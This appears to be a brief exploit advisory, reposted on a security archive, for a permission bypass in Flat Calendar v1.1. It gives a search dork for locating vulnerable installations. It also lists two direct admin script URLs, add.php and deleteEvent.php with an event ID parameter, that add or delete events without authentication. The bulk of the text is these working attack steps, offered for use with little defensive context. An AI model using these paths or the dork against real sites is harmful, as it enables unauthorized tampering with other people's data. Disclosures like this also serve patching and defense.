Flat Calendar version 1.1 allows for administrator bypass when scripts are accessed directly.
5e7708384102bfc84936c466d0e26d24d6d1d332d55c960f0b50de582e550878Flat Calendar v1.1 Remote Permission Bypass Vulnerability
Author : Crackers_Child
Dork : Flat Calendar: View All > Flat Calendar: View All için yaklaşık 654.000 sonuçtan
Exploits:
site.com/calender_path/admin/add.php > Adding New Evetns without admin permissions.
site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > Deleting Events without admin permissions.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed